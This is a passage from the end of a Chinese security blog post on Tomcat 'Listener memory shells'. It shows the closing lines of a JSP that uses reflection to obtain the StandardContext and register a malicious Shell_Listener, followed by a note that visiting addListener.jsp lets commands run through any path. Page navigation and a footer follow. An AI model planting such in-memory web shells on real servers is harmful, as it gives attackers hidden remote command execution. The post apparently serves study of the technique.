standardContextField.setAccessible(<span class="literal">true</span>);</span><br><span class="line">  <span class="type">StandardContext</span> <span class="variable">standardContext</span> <span class="operator">=</span> (StandardContext) standardContextField.get(applicationContext);</span><br><span class="line"></span><br><span class="line">  <span class="type">Shell_Listener</span> <span class="variable">shellListener</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Shell_Listener</span>();</span><br><span class="line">  standardContext.addApplicationEventListener(shellListener);</span><br><span class="line">%&gt;</span><br><span class="line"></span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>将tomcat服务启动后，访问<code>addListener.jsp</code>，将恶意filter注册进tomcat，后续访问任何一个路径，都可以成功执行命令</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1740060142864-8339537b-35c4-4468-b6d8-7254f475520a.png" alt="Listener内存马" loading="lazy"></p>

      </div>
      
        <div class="post-tags" aria-label="文章标签">
          
            <a href="/tags/memShell/"># memShell</a>
          
        </div>
      
    </div>
  </div>

  <nav class="frame post-navigation" aria-label="相邻文章">
    
      <a href="/2025/03/25/Valve%E5%86%85%E5%AD%98%E9%A9%AC/">
        <span>更新一篇</span>
        <strong>Valve内存马</strong>
      </a>
    
    
      <a class="post-navigation__older" href="/2025/03/25/Filter%E5%86%85%E5%AD%98%E9%A9%AC/">
        <span>更早一篇</span>
        <strong>Filter内存马</strong>
      </a>
    
  </nav>
</article>

  </main>
  <footer class="site-footer">
  <div class="frame site-footer__inner">
    <div class="site-footer__identity">
      <a href="/">CURLYSEAN</a>
      <span>持续记录，保持验证。</span>
    </div>
    <p class="site-footer__copyright">© 2025–2026 CurlySean</p>
    <nav class="site-footer__links" aria-label="外部链接">
      <a href="https://github.com/CurlySean" target="_blank" rel="noopener noreferrer">GitHub ↗</a>
      <a href="mailto:5345414e@gmail.com">Email ↗</a>
    </nav>
  </div>
</footer>
<button class="back-to-top" type="button" aria-label="返回顶部" data-back-to-top>↑</button>
<script src="/js/main.js" defer></script>

</body>
</html>
